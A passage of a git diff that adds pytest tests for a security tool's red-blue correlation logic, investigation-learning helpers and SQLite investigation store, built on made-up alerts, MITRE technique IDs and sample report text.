test_correlate_identifies_false_positives( + self, temp_reports_dir: Path, sample_red_activity: RedTeamActivity + ) -> None: + """Test that unmatched detections are identified as false positives.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + # Detection without corresponding red activity + unrelated_detection = BlueTeamDetection( + timestamp=sample_red_activity.timestamp + timedelta(minutes=5), + alert_name="Unrelated Alert", + technique_id="T9999", # No matching red activity + severity="low", + target_ip="10.0.0.1", # Different target + target_host=None, + investigation_id="inv-fp", + status="completed", + evidence_count=0, + highest_pyramid_level=0, + ) + + report = correlator.correlate( + red_activities=[sample_red_activity], + blue_detections=[ + BlueTeamDetection( + timestamp=sample_red_activity.timestamp + timedelta(minutes=2), + alert_name="Matching Alert", + technique_id="T1059.001", + severity="high", + target_ip="192.168.1.100", + target_host=None, + investigation_id="inv-001", + status="completed", + evidence_count=1, + highest_pyramid_level=1, + ), + unrelated_detection, + ], + operation_id="test-op", + ) + + assert len(report.false_positives) == 1 + assert report.false_positives[0].alert_name == "Unrelated Alert" + + def test_technique_coverage_calculation(self, temp_reports_dir: Path) -> None: + """Test technique coverage calculation.""" + correlator = RedBlueCorrelator(temp_reports_dir) + base_time = datetime(2024, 1, 15, 10, 0, 0, tzinfo=timezone.utc) + + # Create activities with DIFFERENT techniques and targets for clear matching + # This ensures each activity can only match its corresponding detection + red_activities = [ + RedTeamActivity( + timestamp=base_time + timedelta(minutes=i * 10), + technique_id=f"T105{i}", # Different technique per activity + technique_name=f"Technique {i}", + action=f"Action {i}", + target_ip=f"192.168.1.{100 + i}", # Different targets + target_host=None, + credential_used=None, + success=True, + ) + for i 
in range(4) + ] + + # Only detect 3 of 4 (activities 0, 1, 2 but not 3) + blue_detections = [ + BlueTeamDetection( + timestamp=base_time + timedelta(minutes=i * 10, seconds=30), + alert_name=f"Alert {i}", + technique_id=f"T105{i}", # Matching technique + severity="high", + target_ip=f"192.168.1.{100 + i}", # Matching targets + target_host=None, + investigation_id=f"inv-{i}", + status="completed", + evidence_count=1, + highest_pyramid_level=1, + ) + for i in range(3) # Only first 3 activities get detected + ] + + report = correlator.correlate( + red_activities=red_activities, + blue_detections=blue_detections, + operation_id="test-op", + ) + + # Should have coverage data for all 4 techniques + assert len(report.technique_coverage) == 4 + # 3 techniques should be detected (T1050, T1051, T1052) + # 1 technique should be missed (T1053) + detected_count = sum(1 for t in report.technique_coverage.values() if t["detected"] > 0) + missed_count = sum(1 for t in report.technique_coverage.values() if t["missed"] > 0) + assert detected_count == 3 + assert missed_count == 1 + assert report.matched_activities == 3 + assert report.undetected_activities == 1 + + def test_mean_time_to_detect( + self, + temp_reports_dir: Path, + ) -> None: + """Test mean time to detect calculation.""" + correlator = RedBlueCorrelator(temp_reports_dir) + base_time = datetime(2024, 1, 15, 10, 0, 0, tzinfo=timezone.utc) + + red_activities = [ + RedTeamActivity( + timestamp=base_time, + technique_id="T1059.001", + technique_name="PowerShell", + action="Action 1", + target_ip="192.168.1.100", + target_host=None, + credential_used=None, + success=True, + ), + RedTeamActivity( + timestamp=base_time + timedelta(minutes=10), + technique_id="T1059.002", + technique_name="Script", + action="Action 2", + target_ip="192.168.1.100", + target_host=None, + credential_used=None, + success=True, + ), + ] + + blue_detections = [ + BlueTeamDetection( + timestamp=base_time + timedelta(seconds=60), # 60s after + 
alert_name="Alert 1", + technique_id="T1059.001", + severity="high", + target_ip="192.168.1.100", + target_host=None, + investigation_id="inv-1", + status="completed", + evidence_count=1, + highest_pyramid_level=1, + ), + BlueTeamDetection( + timestamp=base_time + timedelta(minutes=10, seconds=120), # 120s after + alert_name="Alert 2", + technique_id="T1059.002", + severity="high", + target_ip="192.168.1.100", + target_host=None, + investigation_id="inv-2", + status="completed", + evidence_count=1, + highest_pyramid_level=1, + ), + ] + + report = correlator.correlate( + red_activities=red_activities, + blue_detections=blue_detections, + operation_id="test-op", + ) + + # Mean of 60s and 120s = 90s + assert report.mean_time_to_detect == 90.0 + + def test_generate_report_markdown( + self, + temp_reports_dir: Path, + sample_red_activity: RedTeamActivity, + sample_blue_detection: BlueTeamDetection, + ) -> None: + """Test markdown report generation.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + report = correlator.correlate( + red_activities=[sample_red_activity], + blue_detections=[sample_blue_detection], + operation_id="test-op", + ) + + markdown = correlator.generate_report_markdown(report) + + assert "# Red-Blue Correlation Report" in markdown + assert "Executive Summary" in markdown + assert "test-op" in markdown + assert "Detection Rate" in markdown + + def test_load_red_team_report_basic(self, temp_reports_dir: Path) -> None: + """Test loading a basic red team report.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + # Create a sample red team report + report_content = """# Red Team Operation Report + +**Operation ID**: op-test-001 +**Target**: 192.168.1.100 +**Started**: 2024-01-15 10:00:00 UTC + +### Hosts (3) +Found 3 hosts during scanning. 
+ +### Credentials (2) +**admin** +Source: password guessing + +**backup** +Source: credential dumping + +### Timeline of Key Events +| Timestamp | Event | Technique | +|-----------|-------|-----------| +| 2024-01-15T10:05:00Z | Initial access | T1078 | +| 2024-01-15T10:10:00Z | Privilege escalation | T1068 | + +**Domain Admin Access**: ✓ +**Golden Ticket**: ✓ +""" + report_path = temp_reports_dir / "redteam-op-test-001.md" + report_path.write_text(report_content) + + operation_id, activities = correlator.load_red_team_report(report_path) + + assert operation_id == "op-test-001" + assert len(activities) > 0 + + # Check for network discovery activity + discovery = next((a for a in activities if a.technique_id == "T1046"), None) + assert discovery is not None + assert "3 host" in discovery.action + + def test_load_investigation_report(self, temp_reports_dir: Path) -> None: + """Test loading an investigation report.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + report_content = """# Investigation Report + +**Investigation ID:** `inv-20240115-001` + +| Field | Value | +|-------|-------| +| Alert Name | Suspicious PowerShell Activity | +| Severity | high | +| Status | completed | + +Alert payload contains: +"startsAt": "2024-01-15T10:30:00Z" + +Target IP: 192.168.1.100 + +Technique: T1059.001 + +**Evidence Collected:** 5 +**Highest Pyramid Level:** 3 +""" + report_path = temp_reports_dir / "investigation_20240115_103000.md" + report_path.write_text(report_content) + + detection = correlator.load_investigation_report(report_path) + + assert detection is not None + assert detection.investigation_id == "inv-20240115-001" + assert detection.alert_name == "Suspicious PowerShell Activity" + assert detection.severity == "high" + assert detection.technique_id == "T1059.001" + assert detection.evidence_count == 5 + assert detection.highest_pyramid_level == 3 + + def test_load_investigation_report_skips_no_data(self, temp_reports_dir: Path) -> None: + """Test that 
DatasourceNoData reports are skipped.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + report_path = temp_reports_dir / "investigation_DatasourceNoData_20240115.md" + report_path.write_text("Some content") + + detection = correlator.load_investigation_report(report_path) + + assert detection is None + + def test_load_all_reports(self, temp_reports_dir: Path) -> None: + """Test loading all reports from directory.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + # Create red team report + red_report = temp_reports_dir / "redteam-op001.md" + red_report.write_text("""# Red Team Report +**Operation ID**: op001 +**Target**: 192.168.1.1 +**Started**: 2024-01-15 10:00:00 UTC +### Hosts (1) +### Credentials (0) +""") + + # Create investigation report + inv_report = temp_reports_dir / "investigation_20240115.md" + inv_report.write_text("""# Investigation +**Investigation ID:** `inv-001` +| Alert Name | Test Alert | +| Severity | high | +| Status | completed | +"startsAt": "2024-01-15T10:30:00Z" +**Evidence Collected:** 1 +**Highest Pyramid Level:** 1 +""") + + # Create non-report file (should be ignored) + other_file = temp_reports_dir / "readme.md" + other_file.write_text("# README") + + red_reports, blue_detections = correlator.load_all_reports() + + assert len(red_reports) == 1 + assert red_reports[0][0] == "op001" + assert len(blue_detections) >= 0 # May or may not parse depending on format + + +class TestDetectionGap: + """Tests for DetectionGap dataclass.""" + + def test_gap_with_recommendation(self, sample_red_activity: RedTeamActivity) -> None: + """Test detection gap with recommendation.""" + gap = DetectionGap( + red_activity=sample_red_activity, + reason="No alert rule configured", + recommended_detection="Add PowerShell monitoring rule", + mitre_data_sources=["Process: Process Creation", "Script: Script Execution"], + ) + + assert gap.reason == "No alert rule configured" + assert gap.recommended_detection == "Add PowerShell monitoring rule" + 
assert len(gap.mitre_data_sources) == 2 + + def test_gap_without_recommendation(self, sample_red_activity: RedTeamActivity) -> None: + """Test detection gap without recommendation.""" + gap = DetectionGap( + red_activity=sample_red_activity, + reason="Unknown technique", + ) + + assert gap.recommended_detection is None + assert gap.mitre_data_sources == [] diff --git a/tests/test_learning.py b/tests/test_learning.py new file mode 100644 index 00000000..f515ed6a --- /dev/null +++ b/tests/test_learning.py @@ -0,0 +1,529 @@ +"""Tests for the Learning Tools module.""" + +import tempfile +from datetime import datetime, timedelta, timezone +from pathlib import Path + +import pytest + +from ares.core.persistence import InvestigationStore, StoredInvestigation +from ares.tools.blue.learning import LearningTools + + +@pytest.fixture +def temp_db() -> Path: + """Create a temporary database file.""" + with tempfile.TemporaryDirectory() as tmpdir: + yield Path(tmpdir) / "test_learning.db" + + +@pytest.fixture +def store(temp_db: Path) -> InvestigationStore: + """Create a fresh investigation store.""" + return InvestigationStore(temp_db) + + +@pytest.fixture +def learning_tools(store: InvestigationStore) -> LearningTools: + """Create learning tools with test store.""" + return LearningTools(store=store) + + +@pytest.fixture +def populated_store(store: InvestigationStore) -> InvestigationStore: + """Create a store with sample investigation data.""" + now = datetime.now(timezone.utc) + + # Create several investigations + investigations = [ + StoredInvestigation( + investigation_id=f"inv-{i}", + alert_name="HighCPUUsage", + alert_fingerprint="rule-cpu-001", + severity="warning", + technique_id="T1059.001", + technique_name="PowerShell", + started_at=now - timedelta(hours=i), + completed_at=now - timedelta(hours=i) + timedelta(minutes=10), + duration_seconds=600.0, + status="completed", + evidence_count=i + 1, + highest_pyramid_level=min(i, 4), + techniques_identified=["T1059.001"], 
+ queries_executed=[{"query": "{job='windows'}", "result_count": i}], + query_success_rate=0.7, + effective_queries=["{job='windows'} |= 'powershell'"], + is_true_positive=i % 2 == 0, # Alternating true/false + ) + for i in range(5) + ] + + # Add a different alert type + investigations.append( + StoredInvestigation( + investigation_id="inv-different", + alert_name="SuspiciousLogin", + alert_fingerprint="rule-login-001", + severity="high", + technique_id="T1078", + technique_name="Valid Accounts", + started_at=now - timedelta(hours=1), + completed_at=now - timedelta(minutes=50), + duration_seconds=600.0, + status="completed", + evidence_count=3, + highest_pyramid_level=2, + techniques_identified=["T1078"], + queries_executed=[{"query": "{job='auth'}", "result_count": 5}], + query_success_rate=0.8, + effective_queries=["{job='auth'} |= 'failed'"], + is_true_positive=True, + ) + ) + + for inv in investigations: + store.store_investigation(inv) + + # Add query effectiveness data + for _ in range(5): + store.update_query_effectiveness( + query_pattern="{job='windows'} |= 'powershell'", + successful=True, + produced_evidence=True, + alert_type="HighCPUUsage", + ) + store.update_query_effectiveness( + query_pattern="{job='auth'} |= 'failed'", + successful=True, + produced_evidence=True, + alert_type="SuspiciousLogin", + ) + + return store + + +@pytest.fixture +def populated_learning_tools(populated_store: InvestigationStore) -> LearningTools: + """Create learning tools with populated store.""" + return LearningTools(store=populated_store) + + +class TestLearningToolsInit: + """Tests for LearningTools initialization.""" + + def test_init_with_store(self, store: InvestigationStore) -> None: + """Test initialization with provided store.""" + tools = LearningTools(store=store) + + assert tools._store is store + + def test_init_without_store(self) -> None: + """Test initialization without store uses global.""" + tools = LearningTools() + + assert tools._store is None + # 
Accessing store property should get/create global store + # (but we won't test that to avoid side effects) + + def test_store_property_returns_provided_store(self, store: InvestigationStore) -> None: + """Test that store property returns provided store.""" + tools = LearningTools(store=store) + + assert tools.store is store + + +class TestFindSimilarInvestigations: + """Tests for find_similar_investigations tool.""" + + @pytest.mark.asyncio + async def test_find_similar_no_results(self, learning_tools: LearningTools) -> None: + """Test finding similar investigations with empty store.""" + result = await learning_tools.find_similar_investigations(alert_name="NonexistentAlert") + + assert result["found"] is False + assert result["investigations"] == [] + assert "No similar investigations" in result["message"] + + @pytest.mark.asyncio + async def test_find_similar_by_alert_name( + self, populated_learning_tools: LearningTools + ) -> None: + """Test finding similar investigations by alert name.""" + result = await populated_learning_tools.find_similar_investigations( + alert_name="HighCPUUsage" + ) + + assert result["found"] is True + assert result["count"] >= 1 + assert len(result["investigations"]) >= 1 + + # Check investigation structure + inv = result["investigations"][0] + assert "investigation_id" in inv + assert "alert_name" in inv + assert "similarity_score" in inv + assert "matching_factors" in inv + assert "outcome" in inv + + @pytest.mark.asyncio + async def test_find_similar_by_technique(self, populated_learning_tools: LearningTools) -> None: + """Test finding similar investigations by technique.""" + result = await populated_learning_tools.find_similar_investigations( + technique_id="T1059.001" + ) + + assert result["found"] is True + assert result["count"] >= 1 + + # All results should have the matching technique + for inv in result["investigations"]: + assert inv["technique_id"] == "T1059.001" + + @pytest.mark.asyncio + async def 
test_find_similar_returns_summary( + self, populated_learning_tools: LearningTools + ) -> None: + """Test that find_similar returns summary statistics.""" + result = await populated_learning_tools.find_similar_investigations( + alert_name="HighCPUUsage" + ) + + assert "summary" in result + assert "completion_rate" in result["summary"] + assert "avg_evidence_count" in result["summary"] + assert "true_positives" in result["summary"] + assert "false_positives" in result["summary"] + + @pytest.mark.asyncio + async def test_find_similar_returns_guidance( + self, populated_learning_tools: LearningTools + ) -> None: + """Test that find_similar returns investigation guidance.""" + result = await populated_learning_tools.find_similar_investigations( + alert_name="HighCPUUsage" + ) + + assert "guidance" in result + assert isinstance(result["guidance"], str) + + @pytest.mark.asyncio + async def test_find_similar_respects_limit( + self, populated_learning_tools: LearningTools + ) -> None: + """Test that find_similar respects the limit parameter.""" + result = await populated_learning_tools.find_similar_investigations( + alert_name="HighCPUUsage", + limit=2, + ) + + assert len(result["investigations"]) <= 2 + + @pytest.mark.asyncio + async def test_find_similar_includes_effective_queries( + self, populated_learning_tools: LearningTools + ) -> None: + """Test that results include effective queries.""" + result = await populated_learning_tools.find_similar_investigations( + alert_name="HighCPUUsage" + ) + + # At least one investigation should have effective queries + has_queries = any(inv.get("effective_queries") for inv in result["investigations"]) + assert has_queries or result["count"] == 0 + + +class TestGetEffectiveQueries: + """Tests for get_effective_queries tool.""" + + @pytest.mark.asyncio + async def test_get_effective_no_data(self, learning_tools: LearningTools) -> None: + """Test getting effective queries with no data.""" + result = await 
learning_tools.get_effective_queries() + + assert result["found"] is False + assert result["queries"] == [] + assert "No query effectiveness data" in result["message"] + + @pytest.mark.asyncio + async def test_get_effective_queries_returns_results( + self, populated_learning_tools: LearningTools + ) -> None: + """Test getting effective queries with data.""" + result = await populated_learning_tools.get_effective_queries() + + assert result["found"] is True + assert result["count"] >= 1 + assert len(result["queries"]) >= 1 + + # Check query structure + query = result["queries"][0] + assert "query_pattern" in query + assert "total_uses" in query + assert "success_rate" in query + assert "evidence_rate" in query + + @pytest.mark.asyncio + async def test_get_effective_queries_filtered_by_alert( + self, populated_learning_tools: LearningTools + ) -> None: + """Test getting effective queries filtered by alert type.""" + result = await populated_learning_tools.get_effective_queries(alert_name="HighCPUUsage") + + # Should only return queries used for this alert + for query in result["queries"]: + assert "HighCPUUsage" in query["used_for_alerts"] + + @pytest.mark.asyncio + async def test_get_effective_queries_respects_limit( + self, populated_learning_tools: LearningTools + ) -> None: + """Test that get_effective_queries respects the limit.""" + result = await populated_learning_tools.get_effective_queries(limit=1) + + assert len(result["queries"]) <= 1 + + @pytest.mark.asyncio + async def test_get_effective_queries_includes_recommendation( + self, populated_learning_tools: LearningTools + ) -> None: + """Test that results include a recommendation.""" + result = await populated_learning_tools.get_effective_queries() + + if result["found"]: + assert "recommendation" in result + + +class TestCheckFalsePositivePattern: + """Tests for check_false_positive_pattern tool.""" + + @pytest.mark.asyncio + async def test_check_fp_no_history(self, learning_tools: LearningTools) -> None: 
+ """Test checking FP pattern with no history.""" + result = await learning_tools.check_false_positive_pattern(alert_name="NewAlert") + + assert result["is_known_pattern"] is False + assert result["confidence"] == "low" + assert "No historical data" in result["message"] + + @pytest.mark.asyncio + async def test_check_fp_with_history(self, populated_learning_tools: LearningTools) -> None: + """Test checking FP pattern with history.""" + result = await populated_learning_tools.check_false_positive_pattern( + alert_name="HighCPUUsage" + ) + + assert "false_positive_rate" in result + assert "true_positives" in result or "is_known_pattern" in result + + @pytest.mark.asyncio + async def test_check_fp_high_rate_detection(self, store: InvestigationStore) -> None: + """Test detection of high false positive rate.""" + now = datetime.now(timezone.utc) + + # Create mostly false positive investigations + for i in range(10): + inv = StoredInvestigation( + investigation_id=f"fp-inv-{i}", + alert_name="NoisyAlert", + alert_fingerprint="noisy-rule", + severity="low", + technique_id="T1000", + technique_name="Test", + started_at=now - timedelta(minutes=i), + completed_at=now, + duration_seconds=60.0, + status="completed", + evidence_count=0, + highest_pyramid_level=0, + techniques_identified=[], + queries_executed=[], + query_success_rate=0.0, + effective_queries=[], + is_true_positive=i < 2, # Only 2/10 true positives + ) + store.store_investigation(inv) + + tools = LearningTools(store=store) + result = await tools.check_false_positive_pattern(alert_name="NoisyAlert") + + # Should detect high FP rate (80%) + assert "false_positive_rate" in result + # Either known pattern or has rate info + assert result.get("is_known_pattern") or "80%" in result.get("false_positive_rate", "") + + @pytest.mark.asyncio + async def test_check_fp_with_fingerprint(self, populated_learning_tools: LearningTools) -> None: + """Test checking FP pattern with fingerprint.""" + result = await 
populated_learning_tools.check_false_positive_pattern( + alert_name="HighCPUUsage", + alert_fingerprint="rule-cpu-001", + ) + + # Should use fingerprint for more accurate matching + assert "confidence" in result + + +class TestGetInvestigationStatistics: + """Tests for get_investigation_statistics tool.""" + + @pytest.mark.asyncio + async def test_get_statistics_empty_store(self, learning_tools: LearningTools) -> None: + """Test getting statistics from empty store.""" + result = await learning_tools.get_investigation_statistics() + + assert result["total_investigations"] == 0 + + @pytest.mark.asyncio + async def test_get_statistics_with_data(self, populated_learning_tools: LearningTools) -> None: + """Test getting statistics with data.""" + result = await populated_learning_tools.get_investigation_statistics() + + assert result["total_investigations"] >= 1 + assert "status_distribution" in result + assert "performance" in result + assert "query_insights" in result + assert "labeling" in result + + @pytest.mark.asyncio + async def test_get_statistics_performance_metrics( + self, populated_learning_tools: LearningTools + ) -> None: + """Test that statistics include performance metrics.""" + result = await populated_learning_tools.get_investigation_statistics() + + perf = result["performance"] + assert "avg_evidence_count" in perf + assert "avg_pyramid_level" in perf + assert "avg_duration_seconds" in perf + + @pytest.mark.asyncio + async def test_get_statistics_labeling_info( + self, populated_learning_tools: LearningTools + ) -> None: + """Test that statistics include labeling information.""" + result = await populated_learning_tools.get_investigation_statistics() + + labeling = result["labeling"] + assert "true_positives" in labeling + assert "false_positives" in labeling + # true_positive_rate may be None or a value + assert "true_positive_rate" in labeling + + +class TestGuidanceGeneration: + """Tests for guidance generation helper.""" + + @pytest.mark.asyncio + 
async def test_guidance_with_effective_queries( + self, populated_learning_tools: LearningTools + ) -> None: + """Test guidance includes effective query suggestions.""" + result = await populated_learning_tools.find_similar_investigations( + alert_name="HighCPUUsage" + ) + + # Guidance should mention queries if available + if result["found"]: + guidance = result["guidance"] + # Should have some guidance text + assert len(guidance) > 0 + + @pytest.mark.asyncio + async def test_guidance_with_high_tp_rate(self, store: InvestigationStore) -> None: + """Test guidance for high true positive rate alerts.""" + now = datetime.now(timezone.utc) + + # Create mostly true positive investigations + for i in range(5): + inv = StoredInvestigation( + investigation_id=f"tp-inv-{i}", + alert_name="CriticalAlert", + alert_fingerprint="critical-rule", + severity="critical", + technique_id="T1000", + technique_name="Test", + started_at=now - timedelta(minutes=i), + completed_at=now, + duration_seconds=600.0, + status="completed", + evidence_count=5, + highest_pyramid_level=3, + techniques_identified=["T1000"], + queries_executed=[], + query_success_rate=0.8, + effective_queries=["{job='test'}"], + is_true_positive=True, # All true positives + ) + store.store_investigation(inv) + + tools = LearningTools(store=store) + result = await tools.find_similar_investigations(alert_name="CriticalAlert") + + assert result["found"] is True + # Should mention high TP rate in guidance + guidance = result["guidance"] + assert "true positive" in guidance.lower() or "thorough" in guidance.lower() + + +class TestEdgeCases: + """Tests for edge cases.""" + + @pytest.mark.asyncio + async def test_find_similar_with_all_none_params( + self, populated_learning_tools: LearningTools + ) -> None: + """Test find_similar with all None parameters.""" + result = await populated_learning_tools.find_similar_investigations() + + # Should still return results (recent investigations) + # or indicate no similar found + 
assert "found" in result + + @pytest.mark.asyncio + async def test_unicode_in_alert_name(self, store: InvestigationStore) -> None: + """Test handling of unicode in alert names.""" + now = datetime.now(timezone.utc) + + inv = StoredInvestigation( + investigation_id="unicode-inv", + alert_name="Alert \u2603 Snowman", # Unicode snowman + alert_fingerprint="unicode-rule", + severity="low", + technique_id=None, + technique_name=None, + started_at=now, + completed_at=now, + duration_seconds=60.0, + status="completed", + evidence_count=0, + highest_pyramid_level=0, + techniques_identified=[], + queries_executed=[], + query_success_rate=0.0, + effective_queries=[], + ) + store.store_investigation(inv) + + tools = LearningTools(store=store) + result = await tools.find_similar_investigations(alert_name="Alert \u2603 Snowman") + + assert result["found"] is True + + @pytest.mark.asyncio + async def test_very_long_query_pattern(self, store: InvestigationStore) -> None: + """Test handling of very long query patterns.""" + long_query = "{job='test'}" + " |= 'x'" * 100 + + for _ in range(3): + store.update_query_effectiveness( + query_pattern=long_query, + successful=True, + produced_evidence=True, + alert_type="TestAlert", + ) + + tools = LearningTools(store=store) + result = await tools.get_effective_queries() + + # Should handle long queries without error + assert result["found"] is True diff --git a/tests/test_persistence.py b/tests/test_persistence.py new file mode 100644 index 00000000..996240fc --- /dev/null +++ b/tests/test_persistence.py @@ -0,0 +1,537 @@ +"""Tests for the Investigation Persistence and Learning System.""" + +import tempfile +from datetime import datetime, timedelta, timezone +from pathlib import Path + +import pytest + +from ares.core.persistence import ( + InvestigationStore, + QueryEffectiveness, + StoredInvestigation, + get_investigation_store, + reset_investigation_store, +) + + +@pytest.fixture +def temp_db() -> Path: + """Create a temporary database 
file.""" + with tempfile.TemporaryDirectory() as tmpdir: + yield Path(tmpdir) / "test_investigations.db" + + +@pytest.fixture +def store(temp_db: Path) -> InvestigationStore: + """Create a fresh investigation store.""" + return InvestigationStore(temp_db) + + +@pytest.fixture +def sample_investigation() -> StoredInvestigation: + """Create a sample investigation for testing.""" + now = datetime.now(timezone.utc) + return StoredInvestigation( + investigation_id="inv-001", + alert_name="HighCPUUsage", + alert_fingerprint="rule-123", + severity="warning", + technique_id="T1059.001", + technique_name="PowerShell", + started_at=now - timedelta(minutes=10), + completed_at=now, + duration_seconds=600.0, + status="completed", + evidence_count=5, + highest_pyramid_level=3, + techniques_identified=["T1059.001", "T1086"], + queries_executed=[ + {"query": "{job='windows'}", "result_count": 10}, + {"query": "{job='linux'}", "result_count": 0}, + ], + query_success_rate=0.5, + effective_queries=["{job='windows'}"], + is_true_positive=True, + analyst_notes="Confirmed malicious activity", + metadata={"host": "server01", "user": "admin"}, + ) + + +class TestStoredInvestigation: + """Tests for StoredInvestigation dataclass.""" + + def test_to_dict(self, sample_investigation: StoredInvestigation) -> None: + """Test conversion to dictionary.""" + data = sample_investigation.to_dict() + + assert data["investigation_id"] == "inv-001" + assert data["alert_name"] == "HighCPUUsage" + assert data["severity"] == "warning" + assert data["technique_id"] == "T1059.001" + assert data["status"] == "completed" + assert data["evidence_count"] == 5 + assert data["is_true_positive"] is True + assert "started_at" in data + assert "completed_at" in data + + def test_from_dict(self, sample_investigation: StoredInvestigation) -> None: + """Test creation from dictionary.""" + data = sample_investigation.to_dict() + restored = StoredInvestigation.from_dict(data) + + assert restored.investigation_id == 
sample_investigation.investigation_id + assert restored.alert_name == sample_investigation.alert_name + assert restored.severity == sample_investigation.severity + assert restored.technique_id == sample_investigation.technique_id + assert restored.status == sample_investigation.status + assert restored.evidence_count == sample_investigation.evidence_count + assert restored.is_true_positive == sample_investigation.is_true_positive + + def test_from_dict_with_missing_optional_fields(self) -> None: + """Test creation from dict with missing optional fields.""" + minimal_data = { + "investigation_id": "inv-min", + "alert_name": "TestAlert", + "alert_fingerprint": "fp-001", + "severity": "low", + "started_at": datetime.now(timezone.utc).isoformat(), + "completed_at": datetime.now(timezone.utc).isoformat(), + "duration_seconds": 100.0, + "status": "completed", + "evidence_count": 0, + "highest_pyramid_level": 0, + } + + investigation = StoredInvestigation.from_dict(minimal_data) + + assert investigation.investigation_id == "inv-min" + assert investigation.technique_id is None + assert investigation.techniques_identified == [] + assert investigation.queries_executed == [] + assert investigation.is_true_positive is None + + +class TestQueryEffectiveness: + """Tests for QueryEffectiveness dataclass.""" + + def test_success_rate_calculation(self) -> None: + """Test success rate property.""" + qe = QueryEffectiveness( + query_pattern="{job='test'}", + total_executions=10, + successful_executions=7, + evidence_producing=3, + alert_types=["AlertA"], + ) + + assert qe.success_rate == 0.7 + + def test_evidence_rate_calculation(self) -> None: + """Test evidence rate property.""" + qe = QueryEffectiveness( + query_pattern="{job='test'}", + total_executions=10, + successful_executions=7, + evidence_producing=3, + alert_types=["AlertA"], + ) + + assert qe.evidence_rate == 0.3 + + def test_zero_executions(self) -> None: + """Test rates with zero executions.""" + qe = 
QueryEffectiveness( + query_pattern="{job='test'}", + total_executions=0, + successful_executions=0, + evidence_producing=0, + alert_types=[], + ) + + assert qe.success_rate == 0.0 + assert qe.evidence_rate == 0.0 + + +class TestInvestigationStore: + """Tests for InvestigationStore.""" + + def test_init_creates_schema(self, store: InvestigationStore) -> None: + """Test that schema is created on init.""" + with store._get_connection() as conn: + cursor = conn.cursor() + + # Check investigations table exists + cursor.execute( + "SELECT name FROM sqlite_master WHERE type='table' AND name='investigations'" + ) + assert cursor.fetchone() is not None + + # Check query_effectiveness table exists + cursor.execute( + "SELECT name FROM sqlite_master WHERE type='table' AND name='query_effectiveness'" + ) + assert cursor.fetchone() is not None + + # Check schema_info table exists + cursor.execute( + "SELECT name FROM sqlite_master WHERE type='table' AND name='schema_info'" + ) + assert cursor.fetchone() is not None + + def test_store_and_retrieve_investigation( + self, store: InvestigationStore, sample_investigation: StoredInvestigation + ) -> None: + """Test storing and retrieving an investigation.""" + store.store_investigation(sample_investigation) + + retrieved = store.get_investigation(sample_investigation.investigation_id) + + assert retrieved is not None + assert retrieved.investigation_id == sample_investigation.investigation_id + assert retrieved.alert_name == sample_investigation.alert_name + assert retrieved.evidence_count == sample_investigation.evidence_count + assert retrieved.is_true_positive == sample_investigation.is_true_positive + + def test_get_nonexistent_investigation(self, store: InvestigationStore) -> None: + """Test retrieving a non-existent investigation.""" + result = store.get_investigation("nonexistent-id") + assert result is None + + def test_store_investigation_upsert( + self, store: InvestigationStore, sample_investigation: StoredInvestigation + 
) -> None: + """Test that storing an investigation twice updates it.""" + store.store_investigation(sample_investigation) + + # Modify and store again + sample_investigation.evidence_count = 10 + sample_investigation.status = "escalated" + store.store_investigation(sample_investigation) + + retrieved = store.get_investigation(sample_investigation.investigation_id) + + assert retrieved is not None + assert retrieved.evidence_count == 10 + assert retrieved.status == "escalated" + + def test_find_similar_investigations_by_fingerprint( + self, store: InvestigationStore, sample_investigation: StoredInvestigation + ) -> None: + """Test finding similar investigations by fingerprint.""" + store.store_investigation(sample_investigation) + + similar = store.find_similar_investigations( + alert_fingerprint=sample_investigation.alert_fingerprint + ) + + assert len(similar) == 1 + assert similar[0].investigation.investigation_id == sample_investigation.investigation_id + assert "same_alert_fingerprint" in similar[0].matching_factors + + def test_find_similar_investigations_by_technique(self, store: InvestigationStore) -> None: + """Test finding similar investigations by technique.""" + now = datetime.now(timezone.utc) + + # Create multiple investigations with same technique + for i in range(3): + inv = StoredInvestigation( + investigation_id=f"inv-{i}", + alert_name=f"Alert{i}", + alert_fingerprint=f"fp-{i}", + severity="warning", + technique_id="T1059.001", + technique_name="PowerShell", + started_at=now - timedelta(minutes=10), + completed_at=now, + duration_seconds=600.0, + status="completed", + evidence_count=i, + highest_pyramid_level=i, + techniques_identified=["T1059.001"], + queries_executed=[], + query_success_rate=0.5, + effective_queries=[], + ) + store.store_investigation(inv) + + similar = store.find_similar_investigations(technique_id="T1059.001") + + assert len(similar) == 3 + for sim in similar: + assert "same_technique" in sim.matching_factors + + def 
test_find_similar_investigations_no_criteria( + self, store: InvestigationStore, sample_investigation: StoredInvestigation + ) -> None: + """Test finding similar investigations with no criteria returns recent.""" + store.store_investigation(sample_investigation) + + # Should return recent investigations + similar = store.find_similar_investigations() + + assert len(similar) >= 0 # May be empty or have results + + def test_find_similar_investigations_multiple_criteria( + self, store: InvestigationStore, sample_investigation: StoredInvestigation + ) -> None: + """Test finding similar investigations with multiple criteria.""" + store.store_investigation(sample_investigation) + + similar = store.find_similar_investigations( + alert_name=sample_investigation.alert_name, + technique_id=sample_investigation.technique_id, + severity=sample_investigation.severity, + ) + + assert len(similar) == 1 + # alert_name (0.3) + technique (0.15) + severity (0.05) = 0.5 + # Use > 0.49 to account for floating-point precision + assert similar[0].similarity_score > 0.49 # Should have high score with multiple matches + + def test_update_query_effectiveness_new_query(self, store: InvestigationStore) -> None: + """Test updating effectiveness for a new query.""" + store.update_query_effectiveness( + query_pattern="{job='test'}", + successful=True, + produced_evidence=True, + alert_type="TestAlert", + ) + + effective = store.get_effective_queries(min_evidence_rate=0.0, limit=10) + + # May not appear if total_executions < 3 threshold + # Let's add more executions + for _ in range(2): + store.update_query_effectiveness( + query_pattern="{job='test'}", + successful=True, + produced_evidence=True, + alert_type="TestAlert", + ) + + effective = store.get_effective_queries(min_evidence_rate=0.0, limit=10) + assert len(effective) == 1 + assert effective[0].query_pattern == "{job='test'}" + assert effective[0].total_executions == 3 + + def test_update_query_effectiveness_existing_query(self, store: 
